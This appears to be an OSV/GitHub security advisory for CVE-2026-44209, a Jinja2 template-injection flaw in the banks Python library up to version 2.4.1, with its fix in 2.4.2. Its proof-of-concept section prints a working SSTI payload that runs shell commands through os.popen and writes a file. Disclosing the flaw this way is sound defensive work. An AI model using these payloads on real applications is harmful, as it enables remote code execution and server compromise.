GHSA-gphh-9q3h-jgpp

Suggest an improvement
Source
https://github.com/advisories/GHSA-gphh-9q3h-jgpp
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gphh-9q3h-jgpp/GHSA-gphh-9q3h-jgpp.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-gphh-9q3h-jgpp
Aliases
  • CVE-2026-44209
Published
2026-05-08T20:36:22Z
Modified
2026-05-08T20:49:30.736858Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H CVSS Calculator
Summary
banks has Critical Remote Code Execution (RCE) via Jinja2 SSTI
Details

Summary

banks <= 2.4.1 uses jinja2.Environment() (unsandboxed) to render prompt templates. Applications that pass user-supplied strings as the template argument to Prompt() are vulnerable to Server-Side Template Injection (SSTI), which can lead to Remote Code Execution (RCE) on the host system.

This is a vulnerability in how banks initializes its Jinja2 environment — not in Jinja2 itself.

Vulnerable Code

src/banks/env.py — the global Jinja2 environment is created without sandboxing:

env = Environment(
    autoescape=select_autoescape(enabled_extensions=("html", "xml"), default_for_string=False),
    ...
)

Attack Scenario

An application that stores prompt templates in a database, accepts them via an API, or loads them from a user-supplied config file and passes them to Prompt() is vulnerable. For example:

# User-controlled input reaches Prompt()
user_input = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(user_input)
p.text()  # Executes arbitrary command on the host

Proof of Concept

Setup:

pip install banks==2.4.1

PoC script:

from banks import Prompt

payload = "{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}"
p = Prompt(payload)
result = p.text()
print(f"[+] Output: {result}")

Confirmed output:

[+] Output: uid=1000(ak) gid=1000(ak) groups=1000(ak),27(sudo),...

text

**File-write proof:**
```python
from banks import Prompt

p = Prompt("{{ self.__init__.__globals__.__builtins__.__import__('os').popen('echo POC > /tmp/rce_banks_exec').read() }}")
p.text()

ls -l /tmp/rce_banks_exec
# -rw-rw-r-- 1 ak ak 4 Apr 27 15:36 /tmp/rce_banks_exec

Impact

Applications that allow end-users to supply or customize prompt templates are at risk of full Remote Code Execution, including arbitrary command execution, data exfiltration, and server compromise.

Fix

Fixed in banks 2.4.2 (PR #74) by switching to jinja2.sandbox.SandboxedEnvironment, which blocks the dunder attribute traversal chain this exploit relies on.

Developers on banks <= 2.4.1 should upgrade to 2.4.2 and avoid passing untrusted user input as the template argument to Prompt().

Resources

  • Fix: https://github.com/masci/banks/pull/74
  • CVE-2024-41950 (Haystack — identical root cause, CVSS 7.5)
  • CVE-2025-25362 (spacy-llm — identical root cause)
  • CWE-1336: Improper Neutralization of Special Elements in a Template Engine
Database specific 
{
    "github_reviewed": true,
    "severity": "HIGH",
    "nvd_published_at": null,
    "cwe_ids": [
        "CWE-1336"
    ],
    "github_reviewed_at": "2026-05-08T20:36:22Z"
}
References

Affected packages

PyPI / banks

Package

Name
banks
View open source insights on deps.dev
Purl
pkg:pypi/banks

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
2.4.2

Affected versions

0.*
0.0.1
0.0.2
0.0.3
0.1.0
0.1.1
0.2.0
0.3.0
0.3.1
0.4.1
0.5.0
0.6.0
1.*
1.0.0
1.1.0
1.2.0
1.2.1
1.3.0
1.4.0
1.5.0
1.6.0
1.6.1
1.7.0
1.7.1
1.8.0
2.*
2.0.0
2.1.0
2.1.1
2.1.2
2.1.3
2.2.0
2.3.0
2.4.0
2.4.1

Database specific

last_known_affected_version_range 
"<= 2.4.1"
source 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-gphh-9q3h-jgpp/GHSA-gphh-9q3h-jgpp.json"